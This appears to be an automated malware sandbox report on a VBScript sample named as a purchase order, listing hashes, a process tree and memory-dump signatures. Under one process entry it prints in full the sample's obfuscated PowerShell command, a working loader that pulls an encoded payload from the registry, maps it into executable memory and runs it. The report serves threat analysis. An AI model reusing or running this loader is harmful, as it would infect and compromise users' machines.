                SSDEEP:48:6zJk5TZxiz1MDngQzufTbFtAkMl551uloa3Eq:IIWz1MDngVfTTGKWK
                MD5:0CF30C07EE7CDE87ABEEE7BE453FD1C3
                SHA1:6014B950D79EDF5FD4FA7C34ECD4F395BDE51D06
                SHA-256:1D4A45BA7B3ED7B6CBD4843F7C0726EEB014B609A5C283777BB50EF00950BCB8
                SHA-512:207854F6708CA2F1D3013B83B6BDE1FE738484CE091FB422E33660E5C8D7AFCE3A34047E3A6005BF65983ECB5FA214DA48866267D1C9229DC9410E44F23E71D4
                Malicious:true
                Antivirus:
                • Antivirus: Joe Sandbox ML, Detection: 100%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Q@.c...........!................^&... ...@....... ....................................@..................................&..W....@.......................`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................@&......H.......P ..............................................................BSJB............v4.0.30319......l...t...#~......@...#Strings.... .......#US.(.......#GUID...8...|...#Blob...........G.........%3............................................................0.).....f.....f.......................................... 7............ D............ U............ ^............ i............ y.$.......... ..).......... ..1.......... ..7.......... ..=.......... ..)...................
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (443), with CRLF, CR line terminators
                Category:modified
                Size (bytes):864
                Entropy (8bit):5.331025328863905
                Encrypted:false
                SSDEEP:24:Aqd3ka6KRf1jXEif1jaKaM5DqBVKVrdFAMBJTH:Aika6C1jXEu1jaKxDcVKdBJj
                MD5:E228E21D46CAE1BF0DF2686889AC1F17
                SHA1:7E5670AEEC66BF8A657C47E1C2A6F39F4376F547
                SHA-256:B3F7E73164CC13E52676B39D9C5D2B986B32CADF0A26E480E0D2B38A7609C033
                SHA-512:AD06727C50178B9E77052A326A5C76DDD07E7CBDA819875FFF00A3C908055BB9E6348C7BD447981F6449D33217A2AC74D6C699F0BE03D4D859D61703251437B4
                Malicious:false
                Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\jadyuuoq\jadyuuoq.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\jadyuuoq\jadyuuoq.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                File type:ASCII text, with CRLF line terminators
                Entropy (8bit):5.836608054626225
                TrID:
                  File name:SIEM_PO00938467648.vbs
                  File size:350795
                  MD5:633811bccf3fe62978ce41a04b653083
                  SHA1:bc81307b5c229094617e7cb8cdcaec55eaddad36
                  SHA256:b5e4225737f935940fa23989440d5ea2c123c8affde25d6d7224e2b4abab5608
                  SHA512:ade8c018c14b2c9de5df6c9c82130c309fd85084137d6e919c42b6fe7abb5ffde356f2d951f33ec3355df88f7134d51f66121afa3c7ca9f7bac047e0b73d0fa7
                  SSDEEP:6144:J8YNxYPOwuvNR5vwfZKU2fU/5Mhc1gXcSGN+DieVwzjb6HZIKK:uijvPFWNEClgsSgpeVf6KK
                  TLSH:AB74AE5DDA28DACD4F4E2F4ADC821A47C4654623D02614F9EEB5CB8E11C2ECDCE293D8
                  File Content Preview:..'zephyrian stratagem Wigwamerne177 Alcoholisable53 PROMISINGLY ..'ACETAMID GRANULARITY Mandatet torteaus TANGFORLSENDES ALTOCUMULUS Jambarts ..'Gein187 garglers Goslet Afblsnings ENEHERREDMMERS UNDSEELIGHED TUSSENS Mrtelvrkets139 HOG besvrger stellularl
                  Icon Hash:e8d69ece869a9ec4
                  No network behavior found

                  Target ID:0
                  Start time:18:23:01
                  Start date:29/11/2022
                  Path:C:\Windows\System32\wscript.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SIEM_PO00938467648.vbs"
                  Imagebase:0x7ff65eba0000
                  File size:163840 bytes
                  MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Target ID:1
                  Start time:18:23:02
                  Start date:29/11/2022
                  Path:C:\Windows\System32\cmd.exe
                  Wow64 process (32bit):false
                  Commandline:CMD.EXE /c echo C:\Windows
                  Imagebase:0x7ff632260000
                  File size:273920 bytes
                  MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Target ID:2
                  Start time:18:23:02
                  Start date:29/11/2022
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff7c72c0000
                  File size:625664 bytes
                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Target ID:3
                  Start time:18:23:30
                  Start date:29/11/2022
                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Biliate = """LaABrdGedGa-StTDiyCopsteUn St-UdThoyAupepeWrDReeTrfPaiUsnUmiRetCoiMaoFrnSv Sm'ReuSksUniFunCogKn ToSPhyPrsJatNueSimst;viuSmsPriSknangIm PrSPlyEusGrtgueoemFo.ReRPuuConHutSoiFrmFreIl.JoIFonSntSneLurCooPapJaSTreRerElvKuiticReeFesBr;AmpUpuKobsnlVoiDecAw sasRutRhajetaaiTecSv BrcEslFoaUnsVasLe EbTInuBaeBaiOurCeoKonPr1Ci Sh{Ti[PhDAflUllBuIMimHapMaoAfrEutAn(ad`"""InuLusKieKarMe3Br2Si`"""Rr)Ri]GopMauFlbStlMeiTycSa AesKatInaHjtSmiSvcNe SteHoxattImeTerOpnNa GriBenBrtNo YdDMieResTotEnrBroStyOvCspaMerMieCotKl(sn)Me;Sm[AfDEplLulReIenmFlpRdoHarEgtBr(Ov`"""MigAldMeiPl3In2Er`"""Te)Ce]tapEuuDrbCulMaiHjcAs LgsUdtTraBrtSqiercCo VieBexTetVeetrrHrnMa FoiBanArtHa StSBrcUdaGrlLaeSkWTeiScnSudReoBuwCrEVexChtstESuxKn(NoiFinKutSe MoDLnrIgiBefRatPl,ReiAnnAltJu BeAUdmAmbMiuPalHeaAp,DiiFonKntSp juBpraSesVaoQu,MaiLenImtBa NoiAfaDagVrtPotSyaOv,ChiGenpltRe diVSaeTvjSimboaSotAn1Un5Fr8Ud,GiiTinSttEr YeMSucSlgKurSk)Eg;Ak[KuDDilBulImIRdmAmpAnoVarPrtFr(Sk`"""SvkSqeRorpinFleRelPa3Ov2as`"""Tr)Wo]hepMeuRobBalFriLucRe HysMitFoaUntTaiTmcJa aneDexMitKueSarBlnOi ReiFanSutov drHDeeStaBapBlSBeiSpzBaeKo(StiUnnDitOu YcPKerBroUrpRe,PhiSonxatCl AiANodStrCheFosOv,ViiDenJutDi MuTImoWerArtInrfriPo)Mo;Co[SlDOplSalSpIApmunpReoSjrRotKo(wh`"""JgsSchdieBilShlko3Ge2re.VadUflOmlUn`"""St)Un]BepPauSlbOslBeiUncAs MasMntSyaLetFriTrcpr NoeVixRatFoeRerWenun SevEnofuiTrdRh PaDterFlaFigMeFCiiEnnStiKasBehMi(EsiBonSutPo OpOMumPldSerGe)Ba;Ej[SpDFalBelMeILimhepFroUdrGutAu(Je`"""mawSkifanTemNumIn.ApdKolBolFl`"""Fu)Ho]ScpOvuPrbMdlViiAlcBa BosSatAsaHotLiiFocSi VeeNoxLutHaeBirJenLa HoiennNatGu ArmtjiHoxSceDarTrGSwejotCoDTreFivSuCKeaMipqusSu(SkiBlnCitCh BeNPriBrtSerUd,UditinCotJo VaFaseEwlOb,ThivinQutEo NoAPhfAfsXi9Im3Bl)Ta;Ls[ChDCulCalHaIPumCipIcoFarRetSl(Be`"""RekGleTrrhinAteSilEk3Sa2ur`"""Ti)De]PapFeuDrbFolOpiLkcTn BusAbtSyaUdtMeiSocfr CoeImxFatMoeFrrnanto triMenTotAl KaLUdoEscAskQuRosepasphoOvuForJucApeph(RoiAfnCotTe 
VeLExeSoiUn)Ir;Un[ReDPilIwlOyILammipShoStrFatCr(Bo`"""FlkAueCervanToeJelAv3Pl2Re`"""Se)Co]UnpAnuCobOplFoilacLa CasrotOpaUntMuiKacTi WieKnxEntReeUdrTrnTr AriPonIntSl PiVIniStrpetrauAcaTilvaATelBelCloThcFa(TriStnSotWi GevGr1Sk,SmiLunThtOr CavBl2Ne,KeiStnCotBy Hevdr3pa,HeiGanUptku SvvCa4In)pr;Py[DrDMalInlPrIBrmHepPloKnrPttba(Ho`"""CrAUnDBeVAlAToPanICr3St2Ph.WaDBeLSaLCi`"""To)Un]StpTiuRebSylPuiEncFo CosMotUnaUntHuiAtcst MeeMixDotOfeAdrInnRo SuvBeoUpiVidTi CiMTraBipBeGAteOenSleGlrPriBrcCoMFiaUnsAnkVn(SaiSknMetPe PlBInrTriOdnObkIr,DoiDenQutRu CaMChiUddtitKnsSn)In;Ov[TrDRelSelFuIUnmRipGoosurOmtSc(Ve`"""BrkVaeMerManPeeSklSt3Co2In`"""ef)Ce]BepKouMybKolLbiCocUn EdsGatKuaTetKoiaacLu NoeVexPrtNeeUnrAnnCy PrISenLvtPlPFotBorkr ScEGanSuumemfuSChyFrsPotBeeOomFjLGuoFlcSraNelGaeVosPrWUn(PauDiiEynSttPe GrvEx1ma,PsiHanKotEn KovGr2Ha)Et;Om[OoDrhlDilFlIsumEnpSkoOvrTrtSp(St`"""ObkEdeElrRenTaeDalDi3Sc2Di`"""Si)Ni]FopChuTlbDalCaiAlcLi SmsNytvaaretPriSucTr LueBexGatTreGerManbr ReiGunentAn UnSGieUntTiTEnhPorBieSoaVadEmABlfPafPaiChnFeimitSpySlMPraNisBrkab(CeiNgnCatCr teRBeedebOuuFoiAflUn,BriSlnFitBa SuSTeeAnmHeiDasRr)Ho;Ba[TrDTrlSplVaIMamSapMaoCortitPr(Ud`"""StuNosKoeJorEl3En2Sp`"""St)Bu]chpReuBlbGulFliCacUn OusOutScaUntGoiRecor SteabxArtcheSerBunFo PoiRenJotMi SpSKoeAftJuMEmeInnReuBjIPrtFieStmXeIHongefFeoSi(OpiTrnmotSu ReCRhaBlbBrrSoiSk,AaiDonSktDo reOTepFiaNolUt,UniBunSutFl ClHskaFoaEn,whiHinSptIn GaARemCopFluPr)Ti;Ge}As'Et;Sp`$SpTPtuDueudiKorTooTonPi3Lu=Oo[JgTShuAueAuiFrrAcoovnRe1Bi]Ac:Do:LiVAnikdrBltniuSwaNolWeAStldelNooFocFo(Va0Co,Dr1Un0Ha4An8In5Un7Im6He,al1En2Pr2Ek8St8Gu,Bl6Co4Un)Pe;Ro`$ProFurUpnSaiBetTrhProAasChaBruDarTiiEsaSlnKi=Fi(EkGReeustDe-PrIDetBeeRemSkPGurPloPipReeStrSktMiyOt Ej-JePVeaMatrehTr Sn'EfHPrKTrCuaUSp:Vi\DePgoeMidpnaMigunoOvgCl\ReDCaeVofHmiIbbZerHaiFolSolcoaBatRaiChoPunoveBlnDosMo'Sk)Le.CaELilPluFrtFoiPyoFrnQu;ir`$PoiTanPotGouCurBinHveSidAl Po=sp 
er[PrSAeyKosIntUneTymTi.LuCGaoUbnDavTheAarIntNe]Ox:Zi:ApFGurMuoCamSoBAwaResFreHo6Sa4StSNitLnrUniGunUngFo(St`$ApobjrAunCriIntCohUnoPosUnaKeuMarAniNoaUnnAr)Fo;Sk[TrSEjyAfsVitWaeTimre.GeRGnuFonUntStiKrmUneJo.trILenSatHeeGorsioLopSeSSteDarchvMeiBicBoeEssAj.FeMBraAprNjsFohUnaUnlBa]Me:Ov:haCUdoBrpFjyBr(Ne`$DaiKanBetSluAnrOmnLgePidRe,Sc Fe0yo,Su Na Ko`$PeTMuuUneLiizirEmoannin3Do,Ci Pl`$RiiXanMitSpuSorThnTeeRedMa.SocAloStuRhnKotsp)Ta;Un[FaTKouveeLsifarNooPrnFr1st]Be:Dy:EsEManNouUnmboSUnyTisAstDieMomViLTeoBecDeaUrlBueUnsNoWUn(Po`$AbTPruSyePriAurSkoSinPr3Sk,Uk St0Ha)Ug#Sm;""";Function Tueiron4 { param([String]$sheikdmmerne); For($circumtropical=2; $circumtropical -lt $sheikdmmerne.Length-1; $circumtropical+=(2+1)){ $Driblende = $Driblende + $sheikdmmerne.Substring($circumtropical, 1); } $Driblende;}$Reptilious0 = Tueiron4 'DaIKgEtiXSk ';$Reptilious1= Tueiron4 $Biliate;&$Reptilious0 $Reptilious1;;
                  Imagebase:0xc20000
                  File size:430592 bytes
                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET
                  Reputation:high

                  Target ID:4
                  Start time:18:23:30
                  Start date:29/11/2022
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff7c72c0000
                  File size:625664 bytes
                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Target ID:7
                  Start time:18:24:32
                  Start date:29/11/2022
                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jadyuuoq\jadyuuoq.cmdline
                  Imagebase:0xd30000
                  File size:2170976 bytes
                  MD5 hash:350C52F71BDED7B99668585C15D70EEA
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET
                  Reputation:moderate

                  Target ID:8
                  Start time:18:24:33
                  Start date:29/11/2022
                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8B47.tmp" "c:\Users\user\AppData\Local\Temp\jadyuuoq\CSC891590C19254105A6A792E8745AF5FD.TMP"
                  Imagebase:0x1080000
                  File size:43176 bytes
                  MD5 hash:C09985AE74F0882F208D75DE27770DFA
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.821609911.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_3260000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: @ k
                    • API String ID: 0-3025011885
                    • Opcode ID: 0875caa5f185b7a77db5dafedfa608f13f844f017cd3f72381d1041e21f71168
                    • Instruction ID: e7649a5aecb8e9304f4c8682be4427eccfad740635714e9e79ca48f5842106ac
                    • Opcode Fuzzy Hash: 0875caa5f185b7a77db5dafedfa608f13f844f017cd3f72381d1041e21f71168
                    • Instruction Fuzzy Hash: CCE14E34F042089FCB44EBB4D494AAEB7B2AF89304F25857DD506AB365DF349C46CB91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.821609911.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_3260000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: DK1l$DK1l
                    • API String ID: 0-3187931031
                    • Opcode ID: de9bd2c514fb8d8f32de4316cc85141d8d564e9a399a1fcf5ab87bfc5c5c5550
                    • Instruction ID: edfc754f1122c4cfc451ba5a0073a6dbe08ce8bf9cd17e71d8aa809fc3770916
                    • Opcode Fuzzy Hash: de9bd2c514fb8d8f32de4316cc85141d8d564e9a399a1fcf5ab87bfc5c5c5550
                    • Instruction Fuzzy Hash: FD223A34A00708CFCB15EFA4D4989ADB7B2FF89715B14886AD44A9B364CB75EC86CF50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.821609911.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_3260000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: Xc1l$Xc1l
                    • API String ID: 0-4076191854
                    • Opcode ID: 9fe9db4a7ba09c0dab2d3fb1f5f8df54b43092f21309a394f6d09e41f06d1aec
                    • Instruction ID: 7dd548dff9cd3c67eecced74f465a78258fb43dfbf3ac565377faabda4347a45
                    • Opcode Fuzzy Hash: 9fe9db4a7ba09c0dab2d3fb1f5f8df54b43092f21309a394f6d09e41f06d1aec
                    • Instruction Fuzzy Hash: EAB1E2B4B002058FCB24DF78C48056EB7F6FF85214B1985A9D916DB355DB34EC85CBA2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.822026660.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_32b0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: (j$(j
                    • API String ID: 0-3238734073
                    • Opcode ID: e367312ac1c9deb7f1537249951e634460b6036d7549091c5d0c6e5997e576a8
                    • Instruction ID: b3eb14c910c049b5636bc4a164e99aea1ae9ce1a6c432c6e9affd3fcc322e030
                    • Opcode Fuzzy Hash: e367312ac1c9deb7f1537249951e634460b6036d7549091c5d0c6e5997e576a8
                    • Instruction Fuzzy Hash: EF515E34B202068FDB04DF69C5949AEBBF6FF89754B1584A9E806DB365DB30EC41CB50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.822026660.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_32b0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: d
                    • API String ID: 0-2564639436
                    • Opcode ID: 251bd1c9e96a9645117eafb94ccdac677f23687af8cdec09633e5622c87bbea8
                    • Instruction ID: 317457164ed10cb0b99f8e8cb92afc0d50e9d76aba15539bd37d470fbb7ff2ef
                    • Opcode Fuzzy Hash: 251bd1c9e96a9645117eafb94ccdac677f23687af8cdec09633e5622c87bbea8
                    • Instruction Fuzzy Hash: A8F1AD35A00606CFCB14DF28C4809EAB7F2FF88354B5989A9D5569B765DB30FC86CB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.821609911.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_3260000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: @ k
                    • API String ID: 0-3025011885
                    • Opcode ID: cc90b7b83565774e4e053877e17ce3112bb97b360808ebe5f52eb0a50a206cc5
                    • Instruction ID: 0a64fb85922bf4571c5cbb8071f4f862758a9503720757b14657837c7832091c
                    • Opcode Fuzzy Hash: cc90b7b83565774e4e053877e17ce3112bb97b360808ebe5f52eb0a50a206cc5
                    • Instruction Fuzzy Hash: F9C12D34F042089FCB14DFB4D494AAEBBB2AF89304F258569D506AB369DF349C46CF91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.821609911.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_3260000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: L1j
                    • API String ID: 0-3909831282
                    • Opcode ID: 6367c67f72732b16946d1af54b41bce7bb1bdcfd760d02b409351c04ce6870c0
                    • Instruction ID: 6cd6e1e6993df6780ee0d36ff68db9c7e56e6f420bdf4d0c3fdd6d3b4e2b494d
                    • Opcode Fuzzy Hash: 6367c67f72732b16946d1af54b41bce7bb1bdcfd760d02b409351c04ce6870c0
                    • Instruction Fuzzy Hash: 51C16970A147068FCB14DF69C98099EB7F6BF88304B108968D6469B764DB74FD86CFA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.822026660.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_32b0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: \,l
                    • API String ID: 0-2510834803
                    • Opcode ID: edaee0e670eb6503e67751d53311ffcc197201143d2e3f6bff8ec081811324cf
                    • Instruction ID: e47204125ededdca9f465e6c26f1793a7b270a6be3eaac0d4b6c3c78524433c6
                    • Opcode Fuzzy Hash: edaee0e670eb6503e67751d53311ffcc197201143d2e3f6bff8ec081811324cf
                    • Instruction Fuzzy Hash: 3CA12FB4B442189FD708DBA4C850BAF76BAEBC5708F118528D606DF794CFB59C418B92
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.822026660.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_32b0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: \,l
                    • API String ID: 0-2510834803
                    • Opcode ID: 23826f5fe87df4b37f9ec53a55dd23a40472894e3f4f1aa71bdddfa88b9e339c
                    • Instruction ID: 5e9610a6662697db42765c69dacc6d31bda85abaceb4f2c48206c9009e83a00e
                    • Opcode Fuzzy Hash: 23826f5fe87df4b37f9ec53a55dd23a40472894e3f4f1aa71bdddfa88b9e339c
                    • Instruction Fuzzy Hash: D1A13FB4B442189FDB08DBA4C850BAF77BAEB85708F118538D606DF794CFB59C418B92
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.821609911.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_3260000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: L1j
                    • API String ID: 0-3909831282
                    • Opcode ID: 241e39e05ebaaa275c17b439fb83c97eb216c31ab6e72a9461f0fc87e1a4035c
                    • Instruction ID: 1e1fc9137c1d4098876e96221aadf44ee5723683e0540ccadffff8db4c3258c9
                    • Opcode Fuzzy Hash: 241e39e05ebaaa275c17b439fb83c97eb216c31ab6e72a9461f0fc87e1a4035c
                    • Instruction Fuzzy Hash: 2EA18B30A14706CFCB14DF69C8809AEBBF6FF88304B048968D5469B764DB74E985CFA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.822026660.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_32b0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: @ k
                    • API String ID: 0-3025011885
                    • Opcode ID: bd94c89c6646dc75873bc119116b4cd23520a4d412d6ab2337e79afcd4b69e00
                    • Instruction ID: 27e215d256d8c080e3e95c3f4eac9ce5a3e9e6a66eccd1bbcf7964bf06f14d30
                    • Opcode Fuzzy Hash: bd94c89c6646dc75873bc119116b4cd23520a4d412d6ab2337e79afcd4b69e00
                    • Instruction Fuzzy Hash: 5A51E034A043068FCB04EF64D0949AEB7F2EF88314B56CA68C9069BB55DB78AD45CBD0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.822026660.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_32b0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: DK1l
                    • API String ID: 0-3416545430
                    • Opcode ID: 10ef8afa98e9ccc5774002162a19a3a47358d04318dd33460388c304169e873d
                    • Instruction ID: 7085976dc98cbfee9454df9665e9838d72f77f1e44738d1abdbf8ab6466a0eef
                    • Opcode Fuzzy Hash: 10ef8afa98e9ccc5774002162a19a3a47358d04318dd33460388c304169e873d
                    • Instruction Fuzzy Hash: 4D51A239B102118FCB14DF68D4948AEBBF2FF8931571984A9D55ACB366CB34EC91CB80
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.822026660.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_32b0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: `oAk
                    • API String ID: 0-1793811094
                    • Opcode ID: c867534912c8a486978e3fab22a73d2fcbaf7835557f5615cabcd2ca5695fad8
                    • Instruction ID: 2ae1a8cc39309d61d23f02efd012c362ecc4f0fbbd2d0b45baff5bf2ad88340c
                    • Opcode Fuzzy Hash: c867534912c8a486978e3fab22a73d2fcbaf7835557f5615cabcd2ca5695fad8
                    • Instruction Fuzzy Hash: F1516838E102148FD704EF68E498BEDB7B2AF88301F15C469E916AB395CB75EC41CB60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.822026660.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_32b0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: `oAk
                    • API String ID: 0-1793811094
                    • Opcode ID: 049894f6204113753801bc23b5f1f1548ff92aced7a38c50716b1b669cb5bddc
                    • Instruction ID: e4318e15702019ab8ad922ecd4a4d9dc7ebd67b575a5a27780c0e2d6480bc0e5
                    • Opcode Fuzzy Hash: 049894f6204113753801bc23b5f1f1548ff92aced7a38c50716b1b669cb5bddc
                    • Instruction Fuzzy Hash: D6516B38E202148FD714EF68E494BEDB7B2AF88301F15C569E816AB395CB75EC41CB60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000003.00000002.822026660.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_32b0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 53746caacd32e8661e07025e4960a79d016bc1c1f432dc206dfe1cc43ffdf133
                    • Instruction ID: 07a91169210811d13377e560b1fc2b0a09af9a5f5bacbed86863560857e0da11
                    • Opcode Fuzzy Hash: 53746caacd32e8661e07025e4960a79d016bc1c1f432dc206dfe1cc43ffdf133
                    • Instruction Fuzzy Hash: A5428D75A102158FCB14DF68C884EA9B7B6FF89310F1681A9E50ADB361CB31EC85CF91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000003.00000002.821609911.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_3260000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9709e12b00cd28128a47344d1fd36721dfe5007f838f41b63aeaf474ba05677b
                    • Instruction ID: 8f1b7862f1f5490735d48251707f2a351a90862af87a0e78c6144cdcfbbded49
                    • Opcode Fuzzy Hash: 9709e12b00cd28128a47344d1fd36721dfe5007f838f41b63aeaf474ba05677b
                    • Instruction Fuzzy Hash: D4025D38B102058FCB14EBA9D494AAEB7F6EF88304F158469D506EB355DF74EC82CB91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000003.00000002.821609911.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_3260000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 26c16eba18fe4cba2d651b52b9085fafa908f60100f637942c59a7fea5bb7222
                    • Instruction ID: 8be811bd64efde39cb9cb832a3b395532cbf6e7f5a4522587e025c24e9e64fab
                    • Opcode Fuzzy Hash: 26c16eba18fe4cba2d651b52b9085fafa908f60100f637942c59a7fea5bb7222
                    • Instruction Fuzzy Hash: ECC1C738B042499FDB05DFA4D450BAEBBB6EF88310F158469D506AB395DF34EC81CBA1
                    Uniqueness

                    Uniqueness Score: -1.00%

